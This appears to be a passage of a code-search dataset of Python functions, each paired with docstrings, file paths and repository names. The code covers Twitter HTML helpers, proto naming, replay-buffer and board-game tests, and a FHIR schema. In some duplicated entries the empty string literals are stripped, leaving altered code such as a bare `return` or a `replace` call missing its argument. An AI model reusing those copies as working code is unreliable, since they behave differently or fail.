def test_all(): env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)<|docstring|>Test all methods.<|endoftext|>
feb990a82639fb60aa6cec842b06a3aa807ceab1a868e5b69015086555f32a07
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return '' if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html
Passed the raw JSON data about a User from Twitter's API, it returns an HTMLified version of the User's description. * Replaces t.co URLs with clickable, full links. * Makes #hashtags into clickable links. * Makes @usernames into clickable links. Different to htmlify_tweet() because: * Twitter user data only includes entities for urls, not hashtags etc. https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181 * So we manually make the t.co links into their full, clickable version. * And then use twitter-text-python to linkify everything else.
ditto/twitter/utils.py
htmlify_description
philgyford/django-ditto
54
python
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html
def htmlify_description(json_data): "Passed the raw JSON data about a User from Twitter's API, it returns an\n HTMLified version of the User's description.\n * Replaces t.co URLs with clickable, full links.\n * Makes #hashtags into clickable links.\n * Makes @usernames into clickable links.\n\n Different to htmlify_tweet() because:\n\n * Twitter user data only includes entities for urls, not hashtags etc.\n https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181\n\n * So we manually make the t.co links into their full, clickable version.\n * And then use twitter-text-python to linkify everything else.\n " try: desc = json_data['description'] except KeyError: return if (('entities' in json_data) and ('description' in json_data['entities'])): entities = json_data['entities']['description'] if ('urls' in entities): for entity in entities['urls']: (start, end) = (entity['indices'][0], entity['indices'][1]) shown_url = entity['display_url'] link_url = entity['expanded_url'] url_html = '<a href="%s" rel="external">%s</a>' desc = desc.replace(json_data['description'][start:end], (url_html % (link_url, shown_url))) parser = ttp.Parser() parsed = parser.parse(desc) return parsed.html<|docstring|>Passed the raw JSON data about a User from Twitter's API, it returns an HTMLified version of the User's description. * Replaces t.co URLs with clickable, full links. * Makes #hashtags into clickable links. * Makes @usernames into clickable links. Different to htmlify_tweet() because: * Twitter user data only includes entities for urls, not hashtags etc. https://twittercommunity.com/t/why-do-user-entities-have-only-urls-field-and-not-others/59181 * So we manually make the t.co links into their full, clickable version. * And then use twitter-text-python to linkify everything else.<|endoftext|>
3227f98c678e45d94793df219d7021abd9976149f8fced28afdcb93df4be8dc5
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), '') if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html
Passed the raw JSON data about a Tweet from Twitter's API, it returns an HTMLified version of the Tweet's text. It: * Replaces linebreaks with '<br>'s. * Replaces @mentions with clickable @mentions. * Replaces #hashtags with clickable #hashtags. * Replaces $symbols with clickable $symbols. * Replaces t.co URLs with clickable, full links.
ditto/twitter/utils.py
htmlify_tweet
philgyford/django-ditto
54
python
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), ) if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html
def htmlify_tweet(json_data): "Passed the raw JSON data about a Tweet from Twitter's API, it returns\n an HTMLified version of the Tweet's text. It:\n * Replaces linebreaks with '<br>'s.\n * Replaces @mentions with clickable @mentions.\n * Replaces #hashtags with clickable #hashtags.\n * Replaces $symbols with clickable $symbols.\n * Replaces t.co URLs with clickable, full links.\n " if ('full_text' in json_data): json_data['text'] = json_data['full_text'] if (('entities' in json_data) and ('symbols' not in json_data['entities'])): json_data['entities']['symbols'] = [] html = Twython.html_for_tweet(json_data, use_display_url=True, use_expanded_url=False) try: ents = json_data['entities'] except KeyError: ents = {} urls_count = (len(ents['urls']) if ('urls' in ents) else 0) media_count = (len(ents['media']) if ('media' in ents) else 0) hashtags_count = (len(ents['hashtags']) if ('hashtags' in ents) else 0) symbols_count = (len(ents['symbols']) if ('symbols' in ents) else 0) user_mentions_count = (len(ents['user_mentions']) if ('user_mentions' in ents) else 0) html = html.replace('class="twython-hashtag"', 'rel="external"') html = html.replace('class="twython-mention"', 'rel="external"') html = html.replace('class="twython-media"', 'rel="external"') html = html.replace('class="twython-symbol"', 'rel="external"') if (((urls_count + media_count) > 0) and (urls_count > 0)): for url in ents['urls']: html = html.replace(('<a href="%s" class="twython-url">' % url['url']), ('<a href="%s" rel="external">' % url['expanded_url'])) if (media_count > 0): for item in ents['media']: html = html.replace(('<a href="%s" rel="external">%s</a>' % (item['url'], item['display_url'])), ) if (((((urls_count + media_count) + hashtags_count) + symbols_count) + user_mentions_count) == 0): html = urlize(html) html = re.sub('\\n', '<br>', html.strip()) return html<|docstring|>Passed the raw JSON data about a Tweet from Twitter's API, it returns an HTMLified version of the Tweet's text. 
It: * Replaces linebreaks with '<br>'s. * Replaces @mentions with clickable @mentions. * Replaces #hashtags with clickable #hashtags. * Replaces $symbols with clickable $symbols. * Replaces t.co URLs with clickable, full links.<|endoftext|>
0cf998a9dc02e299177fa3930f96fffb0836ade8314235123c90174362bdfc2a
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. 
The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or '') package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', '')) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info
Return a full Naming instance based on these file descriptors. This is pieced together from the proto package names as well as the ``google.api.metadata`` file annotation. This information may be present in one or many files; this method is tolerant as long as the data does not conflict. Args: file_descriptors (Iterable[~.FileDescriptorProto]): A list of file descriptor protos. This list should only include the files actually targeted for output (not their imports). Returns: ~.Naming: A :class:`~.Naming` instance which is provided to templates as part of the :class:`~.API`. Raises: ValueError: If the provided file descriptors contain contradictory information.
gapic/schema/naming.py
build
nsky80/gapic-generator-python
1
python
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. 
The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or ) package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', )) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info
@classmethod def build(cls, *file_descriptors: Iterable[descriptor_pb2.FileDescriptorProto]) -> 'Naming': 'Return a full Naming instance based on these file descriptors.\n\n This is pieced together from the proto package names as well as the\n ``google.api.metadata`` file annotation. This information may be\n present in one or many files; this method is tolerant as long as\n the data does not conflict.\n\n Args:\n file_descriptors (Iterable[~.FileDescriptorProto]): A list of\n file descriptor protos. This list should only include the\n files actually targeted for output (not their imports).\n\n Returns:\n ~.Naming: A :class:`~.Naming` instance which is provided to\n templates as part of the :class:`~.API`.\n\n Raises:\n ValueError: If the provided file descriptors contain contradictory\n information.\n ' proto_packages = {fd.package for fd in file_descriptors} root_package = os.path.commonprefix(tuple(proto_packages)).rstrip('.') if (not root_package): raise ValueError(f"The protos provided do not share a common root package. Ensure that all explicitly-specified protos are for a single API. 
The packages we got are: {', '.join(proto_packages)}") pattern = '^((?P<namespace>[a-z0-9_.]+)\\.)?(?P<name>[a-z0-9_]+)' version = '\\.(?P<version>v[0-9]+(p[0-9]+)?((alpha|beta)[0-9]+)?)' if re.search(version, root_package): pattern += version match = re.search(pattern=pattern, string=root_package).groupdict() match['namespace'] = (match['namespace'] or ) package_info = cls(name=match['name'].capitalize(), namespace=tuple([i.capitalize() for i in match['namespace'].split('.') if i]), product_name=match['name'].capitalize(), proto_package=root_package, version=match.get('version', )) if ((not package_info.version) and (len(proto_packages) > 1)): raise ValueError('All protos must have the same proto package up to and including the version.') explicit_pkgs = set() for fd in file_descriptors: pkg = fd.options.Extensions[client_pb2.client_package] naming = cls(name=(pkg.title or pkg.product_title), namespace=tuple(pkg.namespace), version=pkg.version) if naming: explicit_pkgs.add(naming) if (len(explicit_pkgs) > 1): raise ValueError('If the google.api.client_package annotation is provided in more than one file, it must be consistent.') if len(explicit_pkgs): return dataclasses.replace(package_info, **dataclasses.asdict(explicit_pkgs.pop())) return package_info<|docstring|>Return a full Naming instance based on these file descriptors. This is pieced together from the proto package names as well as the ``google.api.metadata`` file annotation. This information may be present in one or many files; this method is tolerant as long as the data does not conflict. Args: file_descriptors (Iterable[~.FileDescriptorProto]): A list of file descriptor protos. This list should only include the files actually targeted for output (not their imports). Returns: ~.Naming: A :class:`~.Naming` instance which is provided to templates as part of the :class:`~.API`. Raises: ValueError: If the provided file descriptors contain contradictory information.<|endoftext|>
491f2af3b90b94e733286f13f304fa98f18cb6ab6412befd5b7642de9d65e4e8
def __bool__(self): 'Return True if any of the fields are truthy, False otherwise.' return any([getattr(self, i.name) for i in dataclasses.fields(self)])
Return True if any of the fields are truthy, False otherwise.
gapic/schema/naming.py
__bool__
nsky80/gapic-generator-python
1
python
def __bool__(self): return any([getattr(self, i.name) for i in dataclasses.fields(self)])
def __bool__(self): return any([getattr(self, i.name) for i in dataclasses.fields(self)])<|docstring|>Return True if any of the fields are truthy, False otherwise.<|endoftext|>
bbe26e708a9e3271086766836ceebec5269af7d94c275c7b6a19e12598bcb26b
@property def long_name(self) -> str: 'Return an appropriate title-cased long name.' return ' '.join((tuple(self.namespace) + (self.name,)))
Return an appropriate title-cased long name.
gapic/schema/naming.py
long_name
nsky80/gapic-generator-python
1
python
@property def long_name(self) -> str: return ' '.join((tuple(self.namespace) + (self.name,)))
@property def long_name(self) -> str: return ' '.join((tuple(self.namespace) + (self.name,)))<|docstring|>Return an appropriate title-cased long name.<|endoftext|>
966d7b671cb06347aa4e62471555392935007a95be23e7ad981ac2eea535139e
@property def module_name(self) -> str: 'Return the appropriate Python module name.' return utils.to_valid_module_name(self.name)
Return the appropriate Python module name.
gapic/schema/naming.py
module_name
nsky80/gapic-generator-python
1
python
@property def module_name(self) -> str: return utils.to_valid_module_name(self.name)
@property def module_name(self) -> str: return utils.to_valid_module_name(self.name)<|docstring|>Return the appropriate Python module name.<|endoftext|>
46adab8be26bd914a430ee59b7bb3cd0209f4b24480d94afd640e22108848f8f
@property def module_namespace(self) -> Sequence[str]: 'Return the appropriate Python module namespace as a tuple.' return tuple((utils.to_valid_module_name(i) for i in self.namespace))
Return the appropriate Python module namespace as a tuple.
gapic/schema/naming.py
module_namespace
nsky80/gapic-generator-python
1
python
@property def module_namespace(self) -> Sequence[str]: return tuple((utils.to_valid_module_name(i) for i in self.namespace))
@property def module_namespace(self) -> Sequence[str]: return tuple((utils.to_valid_module_name(i) for i in self.namespace))<|docstring|>Return the appropriate Python module namespace as a tuple.<|endoftext|>
02f57877e2ae72c4b19755432fc16668bcc8ade400c41d1c4433323c9c7a20f4
@property def namespace_packages(self) -> Tuple[str]: 'Return the appropriate Python namespace packages.' answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)
Return the appropriate Python namespace packages.
gapic/schema/naming.py
namespace_packages
nsky80/gapic-generator-python
1
python
@property def namespace_packages(self) -> Tuple[str]: answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)
@property def namespace_packages(self) -> Tuple[str]: answer = [] for cursor in [i.lower() for i in self.namespace]: answer.append((f'{answer[(- 1)]}.{cursor}' if answer else cursor)) return tuple(answer)<|docstring|>Return the appropriate Python namespace packages.<|endoftext|>
ae28db92b09ddbd39deb52ca92bed8cf7b1df04d21af318f5afbe4b3d1b34340
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name
Return the versiond module name (e.g. ``apiname_v1``). If there is no version, this is the same as ``module_name``.
gapic/schema/naming.py
versioned_module_name
nsky80/gapic-generator-python
1
python
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name
@property def versioned_module_name(self) -> str: 'Return the versiond module name (e.g. ``apiname_v1``).\n\n If there is no version, this is the same as ``module_name``.\n ' if self.version: return f'{self.module_name}_{self.version}' return self.module_name<|docstring|>Return the versiond module name (e.g. ``apiname_v1``). If there is no version, this is the same as ``module_name``.<|endoftext|>
f69d032a80821134278f29af5a6afe4cddcc254e8173c0ecea91ecd76cc1d158
@property def warehouse_package_name(self) -> str: 'Return the appropriate Python package name for Warehouse.' answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()
Return the appropriate Python package name for Warehouse.
gapic/schema/naming.py
warehouse_package_name
nsky80/gapic-generator-python
1
python
@property def warehouse_package_name(self) -> str: answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()
@property def warehouse_package_name(self) -> str: answer = (list(self.namespace) + self.name.split(' ')) return '-'.join(answer).lower()<|docstring|>Return the appropriate Python package name for Warehouse.<|endoftext|>
a6172010a3c6935385a60011436839465ddf1bfa80f108760365c4b10ce1f9c4
def get_params(self, deep=False): '\n Get the parameters for this operator.\n ' return core.get_params(self)
Get the parameters for this operator.
src/python/nimbusml/feature_extraction/categorical/onehothashvectorizer.py
get_params
najeeb-kazmi/NimbusML
134
python
def get_params(self, deep=False): '\n \n ' return core.get_params(self)
def get_params(self, deep=False): '\n \n ' return core.get_params(self)<|docstring|>Get the parameters for this operator.<|endoftext|>
213dcfb53b32f6fd2b7081a2576dd11f81df3269012b082ffd1f54e78d77a886
@pytest.mark.django_db def test_get_special(some_datetime): "Test retrieving a square's special square type." special = baker.make('SpecialSquareType', image='') baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())
Test retrieving a square's special square type.
will_of_the_prophets/tests/test_square.py
test_get_special
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db def test_get_special(some_datetime): special = baker.make('SpecialSquareType', image=) baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())
@pytest.mark.django_db def test_get_special(some_datetime): special = baker.make('SpecialSquareType', image=) baker.make('SpecialSquare', square=5, type=special) square = board.Square(number=5, current_position=1, now=some_datetime) assert (special == square.get_special())<|docstring|>Test retrieving a square's special square type.<|endoftext|>
5cc54dfadbc365c39f3e19d2a697392c392b4dac3fdf3af18c70dcbd420d5553
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): 'Test getting the list of buttholes which end in this square.' for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))
Test getting the list of buttholes which end in this square.
will_of_the_prophets/tests/test_square.py
test_get_butthole_ends
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))
@pytest.mark.django_db def test_get_butthole_ends(some_datetime): for start_square in (55, 66, 77): baker.make('Butthole', start_square=start_square, end_square=26) square = board.Square(number=26, current_position=1, now=some_datetime) assert (set(square.get_butthole_ends()) == set([55, 66, 77]))<|docstring|>Test getting the list of buttholes which end in this square.<|endoftext|>
453964647caf2f6718eceb243c7f712c72b4aecb96417dfb1ab2b3f9fc4a5cef
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): 'Test that the was_visited flag is set correctly on squares.' square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)
Test that the was_visited flag is set correctly on squares.
will_of_the_prophets/tests/test_square.py
test_was_visited
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, was_visited', [(74, 75, True), (75, 75, False), (76, 75, False)]) def test_was_visited(some_datetime, number, pos, was_visited): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.was_visited == was_visited)<|docstring|>Test that the was_visited flag is set correctly on squares.<|endoftext|>
51c224995d9a5727d46c084a08be225203d353d2a85fa1a44bb4e9c6c9c7d0a8
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): 'Test the is_current_position flag is set correctly.' square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)
Test the is_current_position flag is set correctly.
will_of_the_prophets/tests/test_square.py
test_is_current_position
craiga/will-of-the-prophets
20
python
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)
@pytest.mark.django_db @pytest.mark.parametrize('number, pos, is_current_position', [(74, 75, False), (75, 75, True), (76, 75, False)]) def test_is_current_position(some_datetime, number, pos, is_current_position): square = board.Square(number=number, current_position=pos, now=some_datetime) assert (square.is_current_position == is_current_position)<|docstring|>Test the is_current_position flag is set correctly.<|endoftext|>
bd8a476f5ee6a8661803d633f123c0d9789bab048830862cf6939a971a6195d4
@staticmethod def get_schema(max_nesting_depth: Optional[int]=6, nesting_depth: int=0, nesting_list: List[str]=[], max_recursion_limit: Optional[int]=2, include_extension: Optional[bool]=False, extension_fields: Optional[List[str]]=['valueBoolean', 'valueCode', 'valueDate', 'valueDateTime', 'valueDecimal', 'valueId', 'valueInteger', 'valuePositiveInt', 'valueString', 'valueTime', 'valueUnsignedInt', 'valueUri', 'valueQuantity'], extension_depth: int=0, max_extension_depth: Optional[int]=2) -> Union[(StructType, DataType)]: '\n The Measure resource provides the definition of a quality measure.\n\n\n id: The logical id of the resource, as used in the URL for the resource. Once\n assigned, this value never changes.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the resource. In order to make the use of extensions safe and\n manageable, there is a strict set of governance applied to the definition and\n use of extensions. Though any implementer is allowed to define an extension,\n there is a set of requirements that SHALL be met as part of the definition of\n the extension.\n\n meta: The metadata about the resource. This is content that is maintained by the\n infrastructure. Changes to the content may not always be associated with\n version changes to the resource.\n\n implicitRules: A reference to a set of rules that were followed when the resource was\n constructed, and which must be understood when processing the content.\n\n language: The base language in which the resource is written.\n\n text: A human-readable narrative that contains a summary of the resource, and may be\n used to represent the content of the resource to a human. 
The narrative need\n not encode all the structured data, but is required to contain sufficient\n detail to make it "clinically safe" for a human to just read the narrative.\n Resource definitions may define what content should be represented in the\n narrative to ensure clinical safety.\n\n contained: These resources do not have an independent existence apart from the resource\n that contains them - they cannot be identified independently, and nor can they\n have their own independent transaction scope.\n\n resourceType: This is a Measure resource\n\n url: An absolute URI that is used to identify this measure when it is referenced in\n a specification, model, design or an instance. This SHALL be a URL, SHOULD be\n globally unique, and SHOULD be an address at which this measure is (or will\n be) published. The URL SHOULD include the major version of the measure. For\n more information see [Technical and Business\n Versions](resource.html#versions).\n\n identifier: A formal identifier that is used to identify this measure when it is\n represented in other formats, or referenced in a specification, model, design\n or an instance.\n\n version: The identifier that is used to identify this version of the measure when it is\n referenced in a specification, model, design or instance. This is an arbitrary\n value managed by the measure author and is not expected to be globally unique.\n For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is\n not available. There is also no expectation that versions can be placed in a\n lexicographical sequence. To provide a version consistent with the Decision\n Support Service specification, use the format Major.Minor.Revision (e.g.\n 1.0.0). For more information on versioning knowledge assets, refer to the\n Decision Support Service specification. Note that a version is required for\n non-experimental active artifacts.\n\n name: A natural language name identifying the measure. 
This name should be usable as\n an identifier for the module by machine processing applications such as code\n generation.\n\n title: A short, descriptive, user-friendly title for the measure.\n\n status: The status of this measure. Enables tracking the life-cycle of the content.\n\n experimental: A boolean value to indicate that this measure is authored for testing purposes\n (or education/evaluation/marketing), and is not intended to be used for\n genuine usage.\n\n date: The date (and optionally time) when the measure was published. The date must\n change if and when the business version changes and it must change if the\n status code changes. In addition, it should change when the substantive\n content of the measure changes.\n\n publisher: The name of the individual or organization that published the measure.\n\n description: A free text natural language description of the measure from a consumer\'s\n perspective.\n\n purpose: Explaination of why this measure is needed and why it has been designed as it\n has.\n\n usage: A detailed description of how the measure is used from a clinical perspective.\n\n approvalDate: The date on which the resource content was approved by the publisher. Approval\n happens once when the content is officially approved for usage.\n\n lastReviewDate: The date on which the resource content was last reviewed. Review happens\n periodically after approval, but doesn\'t change the original approval date.\n\n effectivePeriod: The period during which the measure content was or is planned to be in active\n use.\n\n useContext: The content was developed with a focus and intent of supporting the contexts\n that are listed. These terms may be used to assist with indexing and searching\n for appropriate measure instances.\n\n jurisdiction: A legal or geographic region in which the measure is intended to be 